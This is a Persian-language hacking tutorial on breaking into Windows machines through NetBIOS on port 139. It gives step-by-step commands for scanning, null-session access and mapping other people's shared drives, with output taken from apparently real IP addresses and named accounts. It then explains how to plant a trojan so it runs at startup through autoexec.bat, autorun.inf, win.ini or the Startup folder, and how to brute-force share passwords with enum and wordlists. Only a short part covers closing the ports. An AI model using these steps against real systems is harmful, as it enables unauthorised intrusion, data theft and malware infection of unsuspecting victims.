چيست؟
NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاري است که اجازه به اشتراک گذاشتن منابع رو به ما مي*ده. ما برای به اشتراک گذاشتن فايل*ها و يا پرينتر مي*تونيم از اين پروتکل استفاده کنيم. نکته مهم اين است که NetBIOS فقط در سيستم*عامل ويندوز معني داره (اگرچه ابزارهايي مثل Samba در لينوکس مي*تونن اونو شبيه سازي کنن ولي بحث ما خود پروتکل NetBIOS است). وقتي NetBIOS در ويندوز فعال باشد، بلافاصله سه تا پورت براي استفاده باز مي*شوند. پورت مهم و اصلي پورت ۱۳۹ در tcp است که NetBIOS را هم با اين پورت مي*شناسن. دو پورت ديگر، از نوع udp هستند و عبارتند از پورت ۱۳۷ براي name service و پورت ۱۳۹ براي Datagram service . وقتي قرار باشه که يک سيستم*عامل ويندوز هک بشه ( خصوصا اگه کلاينت باشه ) يکي از اولين مواردي که به ذهن مي*رسه، استفاده از NetBIOS ه.
حالا ببينيم منظور از به اشتراک گذاشتن (Sharing) در مورد فايل*ها و پرينتر*ها چيست؟
به اشتراک گذاشتن در مورد فايل*ها يعني قرار دادن تعدادي فايل در يک کامپيوتر خاص به طوريکه توسط ساير کامپيوترها قابل دسترسي و استفاده باشه. در مورد پرينتر به اشتراک گذاشتن يعني طوري چاپگر متصل به يک کامپيوتر را تنظيم کنيم که توسط ساير کامپيوتر*ها هم قابل استفاده باشه. با توجه به اينکه در سيستم*عامل*هاي ويندوز به صورت پيش*فرض NetBIOS فعال است، پس مي*توان به تعدادي از فايل*ها و فولدرهاي تعدادي از کامپيوترهاي روي شبکه دسترسي داشت و فايل*ها را خواند و حتي کپي يا پاک کرد.
- چگونه با پورت ۱۳۹ صحبت کنيم؟
۱- اولين کاري که مي*کنيم اين است که براي پورت ۱۳۹ پورت اسکن مي*کنيم تا ip هايي را که پورت ۱۳۹ در آنها باز است، پيدا کنيم. من اين کار را با nmap انجام مي*دم. فرض کنيد که يک ip به شماره 217.218.84.29 را تست کرده و به نتيجه زير برسم:
Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):
Port State Service
139/tcp open netbios-ssn
Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP
اين خروجي اعلام مي*کند که پورت ۱۳۹ باز است. پس مي*شود از اين ip استفاده کرد.
۲- حالا مي*خوام با اين پورت ارتباط برقرار کنم. اصولا بايد مثل سابق از telnet يا nc استفاده کنم ولي در مورد پورت ۱۳۹ روش ارتباطي فرق مي*کند. کامنت پرامت را باز کرده و دستور زير را مي*نويسم:
nbtstat -A 217.218.84.29
دستور nbtstat يک ابزار خاص براي کار با NetBIOS است. دقت کنيد که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat داراي پارامتر*هاي بسياري است که اگه مي*خواين همه رو ببينين، بنويسين nbtstat و enter را بزنيد.)
حالا بحث اينه که اين دستور چه* کاري مي*کنه و خروجي به چه صورتي است:
اين دستور به ip مورد نظر وصل مي*شه و از اون مي*خواد ليست منابعي رو که به اشتراک گذاشته رو ليست کنه. در اين حالت ۲ حالت ممکنه اتفاق بيوفته:
الف) مواجه با پيغام Host not found بشم. اين يعني اينکه نمي*تونه ليست منابع را از اون کامپيوتر بگيره (يعني NetBIOS غير فعاله). يعني اگرچه پورت ۱۳۹ بازه ولي قابل استفاده نيست.
ب) ارتباط برقرار بشه و ليست منابع اشتراکي ليست بشه:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
HOME-TU6U0AV86Y<00> UNIQUE Registered
MSHOME <00> GROUP Registered
HOME-TU6U0AV86Y<20> UNIQUE Registered
MSHOME <1E> GROUP Registered
MAC Address = 00-53-45-00-00-00
۳- در اين نتايج چيزي که به درد مي*خوره، سطري است که <20> دارد. اگه <20> نباشد، يعني نمي*تونين از اشتراک گذاري فايل استفاده کنيد ( به عبارت ساده تر بي*خيال شو اين کامپيوتر رو ! ). در اين مثال ما اين سطر را داشتيم پس ادامه مي*دهيم. حالا مي*نويسم:
net view \\217.218.84.29
حالا اگه گفتين چي ميشه؟ درسته! دو حالت ممکنه اتفاق بيوفته:
الف) پيغام بياد
System error 5 has occurred.
Access is denied.
اين يعني نمي*تونين ادامه بدين. به عبارت ديگه ايست! ولي يه کاري مي*تونيد بکنيد و اون اينه که يه null session برقرار کنيد با اون کامپيوتر. اين حالت در مورد ويندوز*هاي سري NT جواب ميده. مي*نويسيد:
net use \\217.218.84.29\IPC$ "" /user:""
حالا چرا مي*گن null session ؟ دليلش اينه که يک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه اين دستور جواب داد مي*تونم دوباره دستور net view \\217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:
Shared resources at \\217.218.84.29
Share name Type Used as Comment
------------------------------------------------
Printer Print Acrobat PDFWriter
Printer2 Print Acrobat Distiller
SharedDocs Disk
The command completed successfully.
عاليه. دقت کنيد که در اين کامپيوتر يک فايل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تاي باقي براي پرينتر است). حالا که رسيدم به اين اسم ديگه آخرين دستور را مي*نويسم.
۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بديم. براي اينکار بايد يک درايو انتخاب کنيد. حتما مي*دونيد که درايو چيه. وقتي شما My Computer را دابل کليک کرده و باز مي*کنيد، يک سري آيکون مي*بينيد که هر کدام اسمي* دارند. مثلا :A براي فلاپي و و و تا مي*رسيد به cdrom که آخرين حرف را دارد. مثلا فرض کنيد که :K باشه. حالا بايد اسم درايو رو براي اشتراک گذاشتن انتخاب کنيد. براي اين*کار حرف بعدي در زبان انگليسي رو به کار ببريد. چون در کامپيوتر من :K آخرين بود، من حرف بعدي يعني :L را انتخاب مي*کنم و دستور زير را مي*نويسم:
net use L: \\217.218.84.29\SharedDocs
به اسم درايو، ip و نام مربوطه که ShareDocs دقت کنيد. چون من اصطلاحا به صورت null session دارم ارتباط مي*گيرم، ممکنه کار نکنه ولي اگه درست کار کنه جواب مي*شنوم:
The command completed successfully.
معرکه است!!! حالا My Computer رو باز کنيد و ببينيد که درايو جديد به ليست درايوها اضافه شده که مي*تونين مثل درايوهاي معمولي با اون کار کنيد و فايل کپي کنيد و ...
۵- وقتي کار تموم شد مي*تونيد درايو رو حذف کنيد. براي اينکار مي*تونين روي درايو رايت*کليک کنيد و Disconnect را انتخاب کنيد. و يا اينکه از دستور
net use /delete L:
استفاده کنيد.
- نکته نکته نکته
۱- يه روش جالب به جاي مرحله ۴ در بالا اينه که مثلا در مرورگر يا در run بنويسيد 217.218.84.29\\ که ip داراي اشتراک است و يا اينکه تايپ کنيد SharedDocsت\217.218.84.29\\ که اصولا بايد جواب بده ( ولي من خودم تست نکردم اينو ).
۲- من دارم به صورت استاندارد کار مي*کنم. بعدا خواهم گفت که چطوري مي*تونيم وقتي تو بعضي از مراحل متوقف مي*شيم، اونو دور بزنيم.
۳- NetBIOS فقط براي کلاينت*ها نيست. من خودم يکبار سايت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت.
۴- اگه داريد يک کلاينت رو هک مي*کنيد، بايد سريع عمل کنيد تا قبل از اينکه طرف disconnect کنه کار شما تموم شده باشه.
۵- روش*هاي ديگري هم براي کار با NetBIOS هست که يکي از اون روش*ها استفاده از يک سري نرم*افزارهاي خاص است که تو درس بعدي توضيح مي*دم و نيز يک روش ديگه اعمال تغييرات در فايل*هاي HOST و LMHOST و استفاده از find در سيستم*عامل ويندوز است. ولي چون اين روش دنگ و فنگش زياده، جالب نيست.
۶- براي اينکه بتونيم با NetBIOS کار کنيم، علاوه بر اينکه در کامپيوتر طرف مقابل بايد فعال باشه، روي کامپيوتر خودمون هم فعال باشه. چون در حالت پيش*فرض در کامپيوتر فعال است، معمولا مشکلي نيست.
- چگونه NetBIOS را روي کامپيوتر خودمان فعال يا غير فعال کنيم؟
براي غيرفعال کردن NetBIOS در ويندوز با توجه به نوع آن ويندوز روش*هاي مختلفي هست. جدول پاييني براي همين موضوع طراحي شده است:
Win 2000 Win XP Home Win XP Professional
Start > Programs > Administrative Tools > Local Security Settings > Local Policies > Security Options > Additional restrictions of anonymous connections > Local policy setting > "No access without explicit anonymous permissions" > Ok Start > Programs > Administrative Tools > Local Security
مي*تونيد به کمک فايروال يا روتر پورت*هاي زير را ببنديد:
135 TCP DCE/RPC Portmapper
137 TCP/UDP NetBIOS Name Service
138 TCP/UDP NetBIOS Datagram Service
139 TCP NetBIOS Session Service
445 TCP Microsoft-DS (Windows 2000 CIFS/SMB)
۱- وقتي پورت ۱۳۹ رو مي*بنديد، ديگه نمي*تونيد از NetBIOS استفاده کنيد ( مگر اينکه دوباره پورت رو به صورت فعال در* آوريد). پس وقتي که کسي رو مي*خواهيد هک کنيد، نياز داريد که براي مدت کوتاهي دوباره پورت رو فعال کنيد.
۲- مي*بينيد که مثلا براي ويندوز ۲۰۰۰ به سه روش کار کنيد، در اين جدول فقط کافي است يکي رو اعمال کنيد.
۳- اگه بعد از غير فعال کردن، دوباره بخواهيد فعال کنيد، در مرحله آخر هر يک از روش*هاي بالا، گزينه*اي که مخالف گزينه ذکر شده در جدول است رو انتخاب کنيد، مثلا اگه در جدول Enabled را نوشته*ايم، شما Disable را انتخاب کنيد.
- چگونه از اين امکانات به اشتراک گذاشتن، براي اجراي يک تروجان روي کامپيوتر قرباني استفاده کنيم؟
خوب ما هنوز طريقه استفاده از تروجان رو ياد نگرفتيم ولي سعي مي*کنم تو يکي از درس*هاي آينده اونو توضيح بدم. ما اينجا مي*خواهيم از تروجان در رابطه با پورت ۱۳۹ استفاده کنيم. حالا سوال اين است که تروجان (trojan) چيست؟
تروجان به*طور ساده برنامه*اي اجرايي است، که ما براي طرف مقابل مي*فرستيم و اگه طرف مقابل اونو اجرا کنه، ما مي*تونيم کنترل سيستم* اونو به دست بياريم. تا اينجا کافي است فعلا ولي بعدا بيشتر توضيح مي*دم.
حالا همان بحث تروجان ولي در رابطه با پورت ۱۳۹ :
روش کار به اين صورت است که فرضا من الان تونستم يک درايو رو از يک کامپيوتر با پورت باز Share کنم. حالا فايل تروجان ( سرور تروجان ) را upload مي*کنم به اون کامپيوتر و اسمي براش انتخاب مي*کنم که طرف مقابل رو به اجراي فايل تشويق کنه. يک اشتباهي که بعضي*ها مي*کنند اينه که بعد از کپي کردن تروجان در کامپيوتر هدف، خود هکر مي*آد و فايل رو دابل کليک مي*کنه، در اين حالت تروجان روي کامپيوتر خودمون (هکر) اجرا مي*شه نه کامپيوتر قرباني. پس ما فقط فايل رو مي*فرستيم و منتظر مي*مونيم که طرف مقابل اجرا کنه.
حالا چند روش رو مطرح مي*کنم که در شرايط خاص حالتي رو ايجاد مي*کنه که نيازي با دابل*کليک توسط قرباني نباشد:
۱- اگه به درايو C کامپيوتر مقابل دسترسي داريد، يک سطر به فايل autoexec.bat اضافه کنيد که نام و مسير فايل اجرايي را در اون سطر بنويسيد. مثلا اگه اسم تروجان ali.exe باشد و در مسير d:\newfolder باشد، سطري که اضافه مي*کنيم به صورت زير است:
d:\newfolder\ali.exe
در اين حالت به محض اولين restart کامپيوتر، تروجان اجرا خواهد شد.
۲- اگه به درايو C دسترسي داريد، مي*تونيد فايلي به اسم Autorun.inf ايجاد کنيد و دستورات زير را بنويسيد ( سطر آخر مطابق با همان تروجان فرضي که در مثال قبل گفتيم، نوشته شده است، اونو با توجه به اسم تروجان و مسير اون تغيير دهيد) :
[autorun]
open=d:\newfolder\ali.exe
۳- اگه به فولدر ويندوز دسترسي داريد، مي*تونيد يک سطر مثل همان مثال قبل ولي براي فايل winstart.bat اجرا کنيد. در اين حالت هم به محض restart اجرا خواهد شد.
۴- اگه به فولدر ويندوز دسترسي داريد، در فايل win.ini و بعد از قسمتي که [windows] نوشته، اين سطر رو اضافه کنيد:
run=d:\newfolder\ali.exe
۵- اگه به فولدر ويندوز دسترسي داريد، مي*تونيد تروجان رو به فولدر Start Menu\Startup اضافه کنيد. در اين حالت نيازي به ويرايش هيچ فايل ديگري نيست.
- ابزارهاي کمکي: ۱- ابزارهاي خط فرماني
۱- enum :
اين برنامه را از اينجا داون*لود کنيد. enum نرم*افزاري با قابليت*هاي فوق*العاده است. از جمله توانايي*هايي که دارد، در مواردي است که کامپيوتر طرف مقابل براي اعمال sharing از ما پسورد بخواد. در اين موارد مي*تونيم به کمک enum و ليستي از پسوردهايي که در يک فايل ذخيره شده، تعداد زيادي پسورد رو چک کنيم ( اصطلاحا cracking ) و شايد به نتيجه برسيم. ( اين موضوع را بعدا بيشتر توضيح مب*دم) کاربردي که الان مد نظر ماست، پيدا کردن ليست share هايي است که کامپيوتر مقابل براي ما باز گذاشته است. مثلا من دستور زير را تايپ کردم، تا ليست اشتراک*هاي آن ip خاص در آن لحظه رو بدست بيارم:
enum -S 217.218.84.29
و جواب شنيدم:
server: 217.218.84.29
setting up session... success.
enumerating shares (pass 1)... got 10 shares, 0 left:
E$ IPC$ D$ print$ SharedDocs F$ Printer2 ADMIN$ C$ Printer
cleaning up... success.
ملاحظه مي*فرماييد که درايو*هاي E و D و F و C و نيز SharedDocs و ... ليست شده است. بقيه مراحل مثل درس ۲۱ است. (دقت کنيد که در اين حالت نيازي به null session نيست ).
۲- nbtscan :
اين برنامه را از اينجا داون*لود کنيد. اين برنامه دقيقا معادل nbtstat است ولي با اين تفاوت که مي*تونه تعداد زيادي ip رو همزمان تست کنه و ليست share ها رو بدست بياره. اين دقيقا راه*حلي است براي سوالي که خيلي از شما دوستان پرسيده بودين. مثلا اگه بنويسم:
nbtscan -v -s : 195.219.49.0-30
که ليست اشتراک*ها رو از ip شماره 195.219.49.0 تا 195.219.49.30 بدست مياره. جواب مي*شنوم:
195.219.49.1 Recvfrom failed: Connection reset by peer
195.219.49.5 Recvfrom failed: Connection reset by peer
195.219.49.6 Recvfrom failed: Connection reset by peer
195.219.49.7 Recvfrom failed: Connection reset by peer
195.219.49.8 Recvfrom failed: Connection reset by peer
195.219.49.12 Recvfrom failed: Connection reset by peer
195.219.49.23:MRS.ZADE :00U
195.219.49.23:ATINET_MRA :00G
195.219.49.23:MRS.ZADE :03U
195.219.49.23:MAC:44-45-53-54-00-00
195.219.49.28:MAC:44-45-53-54-00-00
195.219.49.26:KIYARASH-R96L0K:00U
195.219.49.26:KIYARASH-R96L0K:20U
195.219.49.26:WORKGROUP :00G
195.219.49.26:WORKGROUP :1eG
195.219.49.26:MAC:00-53-45-00-00-00
195.219.49.22:FARHANG-ZCT780D:00U
195.219.49.22:FARHANG-ZCT780D:20U
195.219.49.22:WORKGROUP :00G
195.219.49.22:WORKGROUP :1eG
195.219.49.22:MAC:00-53-45-00-00-00
195.219.49.29:TESSA :00U
195.219.49.29:WORKGROUP :00G
195.219.49.29:TESSA :03U
195.219.49.29:MAC:44-45-53-54-00-00
195.219.49.25:MAC:44-45-53-54-00-00
در مورد ip هايي که 20U را مي*بينيد، يعني sharing رو ميشه استفاده کرد.
۳- winfo :
اينم از جمله برنامه*هايي است که بايد بگم آخر برنامه است!! از اينجا داون*لود کنيد. البته توانايي تست تعداد زيادي ip رو نداره ولي وقتي يه ip رو تست مي*کنه همه*چي شو در رو مي*کنه. (البته ميشه گفت همه اين کارها رو مي*شه با enum هم انجام داد ). مثلا من دستور زير را تايپ کردم :
winfo 195.219.49.184 -n -v
و به نتايج زير رسيدم:
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
-
http://www.ntsecurity.nu/toolbox/winfo/
Trying to establish null session...
Null session established.
SYSTEM INFORMATION:
- OS version: 4.0
DOMAIN INFORMATION:
- Primary domain (legacy): DSG
- Account domain: TEHRAN
Warning: Unable to retrieve domain DNS information.
Reason : Not supported by the remote OS.
PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters
LOCOUT POLICY:
- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0
SESSIONS:
- Computer: ARTAWILL-V0P1QR
- User:
LOGGED IN USERS:
* Administrator
USER ACCOUNTS:
* Administrator
- Password age: 666 days
- Privilege level: Administrator
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for administering the computer/domain
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon ****** path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: Mon Mar 03 23
23 2003
- Last logoff from this DC / computer: Tue Dec 11 23
37 2001
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in administrator account)
* Guest
- Password age: 680 days
- Privilege level: Guest
- Home directory:
- Home directory mapped as:
- Comment: Built-in account for guest access to the computer/domain
- Account is: Disabled
- User can change password: No
- Account is locked out: No
- Password never expires: Yes
- The account is: Normal user
- Logon ****** path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: No
(This account is the built-in guest account)
* TEST
- Password age: 680 days
- Privilege level: User
- Home directory:
- Home directory mapped as:
- Comment:
- Account is: Enabled
- User can change password: Yes
- Account is locked out: No
- Password never expires: No
- The account is: Normal user
- Logon ****** path:
- Full name:
- User comment:
- Can log in from workstations: All
- Last logon to this DC / computer: None
- Last logon to this DC / computer: None
- Account expires: Never
- Max disk space: Unlimited
- Failed logins in a row to this DC / computer: 0
- Path to user profile:
- Password has expired: Yes
WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
SHARES:
* ADMIN$
- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin
* IPC$
- Type: Unknown
- Remark: Remote IPC
* C$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
بعدا سعي خواهم کرد که در مورد تک تک اينها بحث کنم براتون. ولي به عنوان مثال در آخرها مي*تونين، share ها رو ببينيد.
۴- NAT :
اين برنامه را از اينجا داون*لود کنيد. يکي از مهم*ترين کاربرد*هاي اون crack کردن پسورد sharing است ( مثل enum ). براي کار با NAT کافي است، بنويسيد nat و بعد يک فاصله و بعد ip را مي*نويسيم. حتما تست کنيد و نتيجه رو ببينيد... ( تکليف براي خودتون )
۵- و ...
- ابزارهاي کمکي: ۲- ابزارهاي گرافيکي
۱- netbrute :
اين برنامه را از اينجا داون*لود کنيد. من از بين ابزارهاي گرافيکي اينو توصيه مي*کنم اگرچه به اندازه دو نرم*افزار بعدي مشهور نيست. من نمي*خوام روش کار با اينو توضيح بدم چون خيلي تابلو* ه! ضمنا اين نرم*افزار داخل خودش يک پورت اسکنر هم داره که خيلي به درد مي*خوره. حتما حتما حتما داون*لود کنيد اينو و اونقدر انگولکش کنيد که سر در بيارين ازش. قرار نيست که همي*چي رو من بهتون بگم !!
۲- Legion :
اگه بگم مشهورترين نرم*افزار اسکن کردن پورت* ۱۳۹ اين نرم*افزاره، سخن گزافي نيست!! خيلي*ها کشته مرده اون هستن ولي من زياد ازش خوشم نمي*آد. اما بايد قبول کرد که کارش واقعا عاليه!!! به هر حال اگه خواستين داول*لود کنيد، اينجا رو کليک کنيد.
۳- DumpSec يا DumpACL :
اين هم خيلي معروفه. اگه خواستين مي*تونين از اينجا داون*لود کنيد.
- آيا چيز ديگه*اي راجع به اين پورت مونده که بحث نشده باشد؟
بله!
۱- يه نرم*افزاري هست به اسم pqwak که اين*طوري که مي*گن، اگه کامپيوتر مقابل ويندوز ۹۸ باشه، مي*تونه پسورد اونو سه سوت در بياره. ( اين برنامه از نقطه ضعف ويندوز ۹۸ راجع به netbios استفاده مي*کنه و اونو exploit مي*کنه) چون من درسم راجع به هک کردن سرورهاست و نه کلاينت، پس نبايد زياد به درد ما بخوره ( توجه کنيد که ويندوز ۹۸ تو کار کلاينت*اش هم مونده، چه برسه به اينکه سرور باشه! ). خودتون بگردين و اونو اگه مي*خواين پيدا کنيد.
۲- ما بحث استفاده از نقاط ضعف پورت*ها رو هنوز شروع نکرده*ايم و در مورد پورت ۱۳۹ هم همينطوره. به عنوان مثال روش*هايي هست که پورت ۱۳۹ رو exploit کنيم و اون مراحلي که توش گير مي*کرديم رو دور بزنيم.
- نکاتي راجع به enum
خوب قبلا گفتم که enum نرم*افزار بسيار مهمي در ارتباط با پورت ۱۳۹ است. حالا مي*خوام دو کاربرد خاص از اونو براتون توضيح بدم:
۱- گرفتن password policy information :
در ويندوزهاي NT مي*شود يک سري پارامتر رو براي پسوردها ست کرد. مثلا اينکه حداقل طول پسورد و حداکثر اون چقدر باشه و ... براي اينکه اين policy رو بدست بياريد، از سويچ P استفاده مي*کنيم. مثلا مي*نويسيم:
enum -P ***.***.***.***
و جواب مي*شنوم:
server: ***.***.***.***
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
cleaning up... success.
خودتون که دارين مي*بينين!
۲- استفاده از روش cracking براي پيدا کردن پسورد:
اگه با NetBIOS کار کرده باشيد، حتما ديديد که بعضي وقت*ها (خصوصا در مورد سرورها) پسورد از ما سوال ميشه. (پسورد وقتي پرسيده ميشه که بخواهيم، مرحله ۴ رو از بالا انجام بديم). وقتي پسورد نداشته باشيد، کاري نمي*تونيد بکنيد. پس ما کاري که مي*کنيم، اينه که يک سري پسورد را توسط enum تست مي*کنيم که يکي جواب بده - يا اينکه نده !
اصولا تست کردن تعداد زيادي پسورد براي پيدا کردن پسورد درست رو crack کردن پسورد به روش brute force يا bf مي*گن ( اين bf رو با اون bf اشتباه نگيريد!! ). البته استفاده از روش bf مختص NetBIOS نيست و خيلي جاها استفاده ميشه. اينم بگم که استفاده از روش bf يه کمي کلاس کار شما رو به عنوان هکر پايين مياره...
حالا چيري مي*خوايم، يک فايل بزرگ از پسوردهايي است که معمولا مردم استفاده مي*کنن. براي پيدا کردن اين فايل*ها که اصطلاحا dictionary file ناميده مي*شوند به صورت زير است:
الف) استفاده از ديکشنري*هاي آماده مثل The Argon که مشهورترين ديکشنري کرکينگ مي*باشد با حجمي حدود ۲۴ مگابايت!
ب) بعضي وقت*ها خودمون مي*خواهيم يه ديکشنري بسازيم، در اين موارد کاري که مي*کنيم اينه که از نرم*افزارهاي سازنده ديکشنري استفاده مي*کنيم. مثلا وقتي که شما مي*دونيد که فلاني از پسوردهاي ۸ حرفي استفاده مي*کنه و ... براي اين*کار نرم*افزارهاي زيادي هست که چند نمونه مهمش عبارتند از: DCM 2.0 و DICTIONARY MAKER و PASSLIST.TXT GENERATOR و ...
حالا که يه فايل ديکشنري دارم مي*تونم کار کرک پسورد NetBIOS رو شروع کنم. فرض کنيد که وقتي مي*خوام Ali رو در يک ip به شماره ***.***.***.*** رو با يک فايل ديکشنري به اسم theargon.lst کرک کنيم. دستوري که براي اين*کار استفاده مي*کنيم، اينه:
enum -D -f "theargon.lst" -u "Ali" ***.***.***.***
حالا enum مياد و تمام پسوردها رو تست مي*کنه تا ايشالله به جواب برسه!
اينقدر که از enum تعريف کردم ديگه بسه! مشکلي که enum راجع به کرک پسورد داره اينه که خيلي کند کار ميکنه. ممکنه ساعت*ها وقت لازم باشه. راه*حل چيه؟
- راه حل براي سرعت بخشيدن کرک کردن پسورد NetBIOS
راه*حل اينه که اصلا از enum استفاده نکنيد. براي کرک پسورد NetBIOS سعي کنيد از نرم*افزار SMB Auditing Tool استفاده کنيد. در عرض چند دقيقه کار تموم ميشه! دليلش هم اينه که اين نرم*افزار از يک bug استفاده مي*کنه که اجازه ميده تعداد زيادي پسورد رو در يک لحظه تست کنيد. اينم بگم که اين نرم*افزار مخصوص سيستم*عامل لينوکس و يونيکسه. برگرفته از سايت اقاي منوچهر جوانشيري
NetBIOS چيست؟ 
